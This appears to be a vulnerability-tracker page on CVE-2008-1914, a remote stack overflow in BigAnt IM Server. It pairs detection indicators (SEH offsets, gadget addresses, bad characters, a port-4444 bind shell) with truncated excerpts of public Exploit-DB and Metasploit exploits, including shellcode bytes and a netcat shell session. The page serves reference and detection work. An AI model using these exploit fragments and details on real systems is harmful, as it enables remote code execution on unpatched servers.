CVE-2008-1914
published 2008-04-22CVE-2008-1914: Stack-based buffer overflow in the AntServer module (AntServer.exe) in BigAnt IM Server in BigAnt Messenger 2.2 allows remote attackers to execute arbitrary…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
73.72%
99.4th percentile
Stack-based buffer overflow in the AntServer module (AntServer.exe) in BigAnt IM Server in BigAnt Messenger 2.2 allows remote attackers to execute arbitrary code via a long URI in a request to TCP port 6080. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bigantsoft | bigant_messenger | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90
bytes↗
\x6a\x19\x9a\x0f
bytes↗
\xc3\x20\xc4\x6b
- →Detect exploit attempts by monitoring for oversized GET requests (>950 bytes in URI) sent to TCP port 6080 targeting AntServer.exe ↗
- →Detect exploit attempts by monitoring for oversized GET requests (~985 bytes junk + SEH overwrite) sent to TCP port 6660 ↗
- →SEH overwrite occurs at offset 989 in the GET request buffer; look for the short-jump NOP sled pattern \xeb\x06\x90\x90 at that offset ↗
- →Payload uses AlphanumUpper encoder; look for all-uppercase alphanumeric shellcode following the SEH overwrite in GET requests to ports 6080/6660 ↗
- →The p/p/r gadget from VBAJET32.dll (0x0f9a196a) is used as the SEH handler address; flag connections where this value appears in the GET request body ↗
- →The p/p/r gadget from MFC42.DLL (0x6bc420c3) is used as the SEH handler address in the universal exploit variant ↗
- →Successful exploitation results in a bind shell on TCP port 4444 on the victim; monitor for unexpected listening services on that port after connections to 6080/6660 ↗
- ·Two different default ports are used depending on the BigAnt version targeted: TCP 6080 for version 2.2 and TCP 6660 for version 2.50 SP1; detection rules must cover both ports ↗
- ·The CVE-2008-1914 reference is reused for the BigAnt 2.50 SP1 module, though it is noted as potentially incorrect ('It's not clear if these are correct - there was a fix for the v2.2 vuln back in Dec 2008') ↗
- ·Bad characters for payload encoding are \x00\x20\x0a\x0d (null, space, LF, CR); detection signatures based on raw shellcode bytes must account for alphanumeric encoding ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2008-1914 BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)
BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: bigant_server_250.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BigAnt Server 2.50 SP1 Buffer Overflow',
'Description' => %q{
This exploits a stack buffer overflow in the BigAnt Messaging Service,
part of the BigAnt Server product suite. This module was tested
successfully against version 2.50 SP1.
},
'Author' => [ 'Dr_IDE ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
# It's not clear if thes
Exploit-DB
BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-1914 BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)
BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: bigant_server.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BigAnt Server 2.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in BigAnt Server 2.2.
By sending a specially crafted packet, an attacker may be
able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-1914' ],
[ 'OSVDB', '44454' ],
[ 'BID', '2879
Exploit-DB
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder:
Exploit-DB
BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x
Exploit-DB
BigAnt Server 2.2 - Remote Overflow (SEH)
exploitdb·2008-04-15
CVE-2008-1914 BigAnt Server 2.2 - Remote Overflow (SEH)
BigAnt Server 2.2 - Remote Overflow (SEH)
---
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 1
Metasploit
BigAnt Server 2.2 Buffer Overflow
metasploit
BigAnt Server 2.2 Buffer Overflow
BigAnt Server 2.2 Buffer Overflow
This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
BigAnt Server 2.50 SP1 Buffer Overflow
metasploit
BigAnt Server 2.50 SP1 Buffer Overflow
BigAnt Server 2.50 SP1 Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1.
No writeups or analysis indexed.
http://secunia.com/advisories/29831http://www.securityfocus.com/archive/1/490916/100/0/threadedhttp://www.securityfocus.com/archive/1/491035/100/0/threadedhttp://www.securityfocus.com/bid/28795http://www.vupen.com/english/advisories/2008/1238/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41830https://www.exploit-db.com/exploits/5451http://secunia.com/advisories/29831http://www.securityfocus.com/archive/1/490916/100/0/threadedhttp://www.securityfocus.com/archive/1/491035/100/0/threadedhttp://www.securityfocus.com/bid/28795http://www.vupen.com/english/advisories/2008/1238/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41830https://www.exploit-db.com/exploits/5451
2008-04-22
Published